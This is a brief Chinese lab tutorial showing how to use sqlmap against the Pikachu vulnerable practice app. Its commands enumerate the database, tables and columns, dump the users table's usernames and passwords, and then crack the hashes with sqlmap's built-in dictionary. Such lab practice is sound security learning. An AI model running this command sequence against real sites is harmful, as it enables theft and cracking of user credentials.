安装下载说明：https://www.cnblogs.com/TNSSTAR/p/8359781.html（往下翻 前面是BurPsuite 后面是sqlmap）

打开sqlmap 在里面 输入 sqlmap.py -u “网址”（注意空格）

先在pikachu上面 字符型注入里输入111 如下

输入 sqlmap.py -u “网址” --current-db 获取当前数据库名称
输入 sqlmap.py -u “网址” -D pikachu --tables 拿数据库的表

输入 sqlmap.py -u “网址” -D pikachu -T users --columns 拿数据库的表的列的名称
输入 sqlmap.py -u “网址” -D pikachu -T users -C username,password --dump 拿数据库的表的列的名称
按照选项破译（sqlmap自带字典）